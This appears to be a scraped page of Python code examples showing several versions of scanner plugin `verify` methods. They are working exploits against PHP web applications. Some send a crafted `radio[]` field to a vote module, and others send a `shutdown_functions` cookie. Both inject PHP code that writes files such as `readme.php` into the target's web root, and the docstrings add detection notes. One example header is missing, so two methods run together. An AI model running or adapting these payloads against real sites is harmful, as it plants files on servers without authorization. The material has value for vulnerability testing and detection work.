Esempio n. 1
    def verify(cls, args):
        """Check a target's vote module for the ``radio[]`` PHP file-write issue.

        Walks the subject ids returned by ``cls.get_vote_links(args)``. For
        each id it POSTs a crafted ``radio[]`` field to the ``a=post`` vote
        action, requests the matching ``a=result`` action, and then asks
        ``PhpVerify.check`` about ``/readme.php`` under the target
        (``cmVhZG1lLnBocA`` is unpadded base64 for ``readme.php``).

        Returns ``args`` with ``args['success']`` set. On the first hit
        ``args['poc_ret']['vul_url']`` is set to the target and the loop ends.

        Review notes: HTTP responses are ignored and no timeout is passed to
        ``requests``. Nothing visible here removes the file after a positive
        check, so a hit leaves an artefact in the target's web root. In logs
        the sequence is distinctive: a POST to ``m=vote&c=index&a=post`` whose
        ``radio[]`` value contains ``fputs(fopen(base64_decode(``, a GET for
        ``a=result``, then whatever request ``PhpVerify.check`` makes for
        ``/readme.php``.
        """
        base_url = args['options']['target']
        checker = PhpVerify()
        subject_ids = cls.get_vote_links(args)

        # No vote subjects were discovered, so there is nothing to probe.
        if not subject_ids:
            args['success'] = False
            return args

        for subject_id in subject_ids:
            post_url = base_url + (
                '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % str(subject_id))
            if args['options']['verbose']:
                print('[*] Request URL: ' + post_url)

            # The marker content is fetched on every iteration, before the POST.
            form = {
                'subjectid': subject_id,
                'radio[]': (');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                            '"%s");\x80') % checker.get_content(),
            }
            requests.post(post_url, data=form)

            result_path = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % str(subject_id)
            requests.get(base_url + result_path)

            marker_url = base_url + '/readme.php'
            if checker.check(marker_url):
                args['success'] = True
                args['poc_ret']['vul_url'] = args['options']['target']
                return args

            # This subject id did not produce the marker; try the next one.
            args['success'] = False

        return args
Esempio n. 2
    def verify(cls, args):
        """Run the vote-module file-write check against ``args['options']['target']``.

        ``cls.get_vote_links(args)`` supplies the vote subject ids. Each id
        gets one POST to the ``a=post`` action carrying a crafted ``radio[]``
        value, one GET to the ``a=result`` action, and one
        ``PhpVerify.check`` call for ``<target>/readme.php``.

        ``args`` is returned in every case. ``args['success']`` is ``True``
        only if ``PhpVerify.check`` accepted the URL for some id, in which
        case ``args['poc_ret']['vul_url']`` records the target.

        Review notes: the responses of both requests are discarded, no
        timeout is set, and the method has no clean-up step for the file it
        checks for. What ``PhpVerify.check`` compares is not visible here.
        """
        target = args['options']['target']
        verifier = PhpVerify()
        vote_ids = cls.get_vote_links(args)

        if not vote_ids:
            # Nothing to test against.
            args['success'] = False
        else:
            post_template = '/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1'
            result_template = '/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1'
            for vote_id in vote_ids:
                request_url = target + post_template % str(vote_id)
                if args['options']['verbose']:
                    print('[*] Request URL: ' + request_url)

                # Field value sent in radio[]; it embeds the PhpVerify content.
                radio_value = (');fputs(fopen(base64_decode(cmVhZG1lLnBocA),w),'
                               '"%s");\x80' % verifier.get_content())
                body = {'subjectid': vote_id, 'radio[]': radio_value}

                requests.post(request_url, data=body)
                requests.get(target + result_template % str(vote_id))

                written_url = target + '/readme.php'
                confirmed = verifier.check(written_url)
                if not confirmed:
                    args['success'] = False
                    continue

                # First confirmed id ends the scan.
                args['success'] = True
                args['poc_ret']['vul_url'] = args['options']['target']
                return args

        return args
Esempio n. 3
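    def verify(cls, args):
        """Check the target for the ``shutdown_functions`` cookie issue.

        Substitutes the base64-encoded ``PhpVerify`` content into the
        class-level ``shutdown_functions[0][arguments][]`` cookie, sends one
        GET to the target with ``cls.cookies``, and then asks
        ``PhpVerify.check`` about ``<target>/inc/class_tester.php``.

        Returns ``args``. ``args['success']`` is always set: ``True`` together
        with ``args['poc_ret']['vul_url']`` on a hit, ``False`` otherwise.

        Review notes: the response is ignored and no timeout is passed to
        ``requests``. Nothing visible here removes the file after a positive
        check. In logs, the request stands out by its cookie names starting
        with ``shutdown_functions[``. Verbose mode prints the full cookie
        value to stdout.
        """
        vul_url = args['options']['target']
        shell_url = vul_url + '/inc/class_tester.php'
        php = PhpVerify()
        # NOTE(review): this overwrites the shared class-level cookie template
        # in place, so the placeholder is only filled on the first call. That
        # side effect is kept because other code may read ``cls.cookies``.
        # Confirm that verify runs once per process.
        cls.cookies['shutdown_functions[0][arguments][]'] = \
            cls.cookies['shutdown_functions[0][arguments][]'].format(b64encode(php.get_content()))
        if args['options']['verbose']:
            print('[*] Request URL: ' + vul_url)
            print('[*] Payload Content: ' + cls.cookies['shutdown_functions[0][arguments][]'])
        requests.get(vul_url, cookies=cls.cookies)

        if php.check(shell_url):
            args['success'] = True
            args['poc_ret']['vul_url'] = vul_url
        else:
            # Report a negative result explicitly, as the other verify
            # variants do, instead of leaving the flag at its earlier value.
            args['success'] = False
        return args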
    def verify(cls, args):
        """Run the ``shutdown_functions`` cookie check against the target.

        The class-level cookie ``shutdown_functions[0][arguments][]`` is
        formatted with the base64-encoded ``PhpVerify`` content, one GET is
        sent to the target with ``cls.cookies``, and ``PhpVerify.check`` is
        asked about ``<target>/inc/class_tester.php``.

        Returns ``args`` with ``args['success']`` set to ``True`` or
        ``False``. On success ``args['poc_ret']['vul_url']`` holds the target.

        Review notes: the cookie template on the class is replaced in place,
        so the substitution only happens on the first call. The GET response
        is discarded and no timeout is set. The method has no clean-up step
        for the file it checks for.
        """
        target = args['options']['target']
        probe_url = target + '/inc/class_tester.php'
        checker = PhpVerify()

        cookie_name = 'shutdown_functions[0][arguments][]'
        template = cls.cookies[cookie_name]
        cls.cookies[cookie_name] = template.format(b64encode(checker.get_content()))

        if args['options']['verbose']:
            print('[*] Request URL: ' + target)
            print('[*] Payload Content: ' + cls.cookies[cookie_name])

        requests.get(target, cookies=cls.cookies)

        # Guard clause: report the negative result first.
        if not checker.check(probe_url):
            args['success'] = False
            return args

        args['success'] = True
        args['poc_ret']['vul_url'] = target
        return args
Esempio n. 5
    def verify(cls, args):
        """Probe the vote subjects of a target for the ``radio[]`` file-write issue.

        The ids come from ``cls.get_vote_links(args)``. For each id the method
        POSTs a crafted ``radio[]`` field to the vote ``a=post`` action, GETs
        the ``a=result`` action for the same id, and passes
        ``<target>/readme.php`` to ``PhpVerify.check``.

        Returns ``args``. ``args["success"]`` ends up ``True`` on the first
        id that ``PhpVerify.check`` confirms (``args["poc_ret"]["vul_url"]``
        is then set to the target) and ``False`` otherwise.

        Review notes: neither response is inspected and no timeout is given
        to ``requests``. A positive check leaves the written file in place as
        far as this method is concerned. For detection, match on POST bodies
        to ``m=vote&c=index&a=post`` whose ``radio[]`` field contains
        ``fputs(fopen(base64_decode(``.
        """
        site = args["options"]["target"]
        helper = PhpVerify()
        found_ids = cls.get_vote_links(args)

        if found_ids:
            for sid in found_ids:
                vote_path = "/index.php?m=vote&c=index&a=post&subjectid=%s&siteid=1" % str(sid)
                vote_url = site + vote_path
                if args["options"]["verbose"]:
                    print("[*] Request URL: " + vote_url)

                fields = {}
                fields["subjectid"] = sid
                # Adjacent literals are joined before the % substitution runs.
                fields["radio[]"] = (
                    ");fputs(fopen(base64_decode(cmVhZG1lLnBocA),w)," '"%s");\x80' % helper.get_content()
                )

                requests.post(vote_url, data=fields)
                requests.get(site + "/index.php?m=vote&c=index&a=result&subjectid=%s&siteid=1" % str(sid))

                if helper.check(site + "/readme.php"):
                    args["success"] = True
                    args["poc_ret"]["vul_url"] = args["options"]["target"]
                    return args

                # Not confirmed for this id; keep going.
                args["success"] = False
            return args

        # Empty id list: nothing was tested.
        args["success"] = False
        return args